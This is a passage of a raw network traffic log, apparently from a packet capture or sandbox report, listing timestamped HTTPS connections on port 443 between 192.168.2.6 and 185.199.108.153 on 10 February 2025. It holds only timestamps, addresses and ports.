                                                                                                              Feb 10, 2025 19:58:21.695044994 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.695067883 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.695096016 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.736588001 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736612082 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736726999 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.736761093 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.736826897 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779242992 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779269934 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779335976 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779362917 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779381990 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779407978 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779447079 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779464006 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779498100 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779504061 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779530048 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779553890 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779659033 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779676914 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779723883 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779731035 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779774904 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.779934883 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.779952049 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780019999 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780026913 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780066967 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780128002 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780144930 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780184984 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780193090 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780237913 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780405045 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780421972 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780466080 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780473948 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780528069 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780841112 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780857086 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780889988 CET49711443192.168.2.6185.199.108.153
                                                                                                              Feb 10, 2025 19:58:21.780899048 CET44349711185.199.108.153192.168.2.6
                                                                                                              Feb 10, 2025 19:58:21.780929089 CET49711443